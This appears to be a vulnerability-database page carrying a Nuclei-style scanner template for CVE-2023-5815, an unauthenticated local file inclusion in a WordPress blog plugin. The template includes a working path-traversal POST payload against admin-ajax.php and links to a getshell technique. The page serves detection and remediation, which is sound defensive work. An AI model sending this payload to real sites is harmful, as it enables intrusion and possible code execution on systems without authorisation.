News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion

CVE-2023-5815

Early Release

Description

The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.

Severity

High

CVSS Score

8.1

Exploit Probability

33%

Affected Product

news_\&_blog_designer_pack

Published Date

November 30, 2025

Template Author

daffainfo

CVE-2023-5815.yaml

id: CVE-2023-5815

info:
  name: News & Blog Designer Pack – WordPress Blog Plugin <= 3.4.1 - Unauthenticated Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    The News & Blog Designer Pack WordPress plugin up to version 3.4.1 contains a remote code execution caused by local file inclusion in the bdp_get_more_post function, letting unauthenticated attackers include arbitrary PHP files, exploit requires AJAX request with crafted POST data.
  impact: |
    Attackers can include arbitrary PHP files, leading to remote code execution and full site compromise.
  remediation: |
    Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.
  reference:
    - https://wordpress.org/plugins/blog-designer-pack/
    - https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-5815
    epss-score: 0.32645
    epss-percentile: 0.96641
    cpe: cpe:2.3:a:infornweb:news_\&_blog_designer_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: infornweb
    product: news_\&_blog_designer_pack
    framework: wordpress
    publicwww-query: "/wp-content/plugins/blog-designer-pack/"
  tags: cve,cve2023,wordpress,wp,wp-plugin,blog-designer-pack,lfi

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post&shrt_param[design]=../../../../../wp-login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success"'
          - '"data"'
          - 'wp-login'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 490a004630440220051ed5e07c92cfe8f9cb13fac5558ad73e31ead0ad568eeda275a5e9719346d3022058c81886d8d5f565b99d925a27738e17480513f7a3b21b7acc6adae5106eac4b:922c64590222798bb761d5b6d8e72950

8.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2023-5815

References

https://wordpress.org/plugins/blog-designer-pack/https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2bdf11-401a-48af-b1dc-aeeb40b9a384?source=cve

Remediation Steps

Update to the latest version beyond 3.4.1 or disable the vulnerable AJAX functionality.